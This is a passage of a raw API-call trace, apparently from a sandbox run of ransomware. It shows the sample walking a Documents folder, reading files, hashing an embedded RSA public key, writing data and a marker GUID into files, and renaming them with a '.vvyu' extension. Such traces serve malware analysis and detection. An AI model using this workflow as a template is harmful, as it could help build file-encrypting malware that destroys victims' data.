RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.512] GetCurrentThreadId () returned 0x264 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36b98 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.513] GetCurrentThreadId () returned 0x264 [0184.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e978 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9d8 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9f0 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e990 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e960 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31450 | out: hHeap=0x6a0000) returned 1 [0184.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.522] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x14af9, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x14af9, lpOverlapped=0x0) returned 1 [0184.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.523] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14afe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.523] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.525] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.525] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.525] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.525] CloseHandle (hObject=0x584) returned 1 [0184.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d41908 [0184.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.528] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\a1p6lyHhe5fq5DudW9XM.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\a1p6lyhhe5fq5dudw9xm.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\a1p6lyHhe5fq5DudW9XM.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\a1p6lyhhe5fq5dudw9xm.rtf.vvyu")) returned 1 [0184.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.543] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.547] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11bff20, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x44edc060, ftLastAccessTime.dwHighDateTime=0x1d8a2b2, ftLastWriteTime.dwLowDateTime=0x44edc060, ftLastWriteTime.dwHighDateTime=0x1d8a2b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AzlD", cAlternateFileName="")) returned 1 [0184.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0184.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0184.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0184.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b68 | out: hHeap=0x6a0000) returned 1 [0184.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.548] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca04b60, ftCreationTime.dwHighDateTime=0x1d8a0eb, ftLastAccessTime.dwLowDateTime=0x70920890, ftLastAccessTime.dwHighDateTime=0x1d8a5b2, ftLastWriteTime.dwLowDateTime=0x70920890, ftLastWriteTime.dwHighDateTime=0x1d8a5b2, nFileSizeHigh=0x0, nFileSizeLow=0x9693, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BFlHqgTM.pdf", cAlternateFileName="")) returned 1 [0184.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31450 [0184.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31450 | out: hHeap=0x6a0000) returned 1 [0184.548] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\BFlHqgTM.pdf") returned=".pdf" [0184.549] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\BFlHqgTM.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\bflhqgtm.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.552] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=38547) returned 1 [0184.552] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.555] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x966d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.555] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.558] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.558] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x9693, lpOverlapped=0x0) returned 1 [0184.559] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.559] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.559] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.559] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.561] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.561] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.561] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.562] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.562] GetLastError () returned 0x0 [0184.562] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.562] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.562] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.562] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.562] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.563] 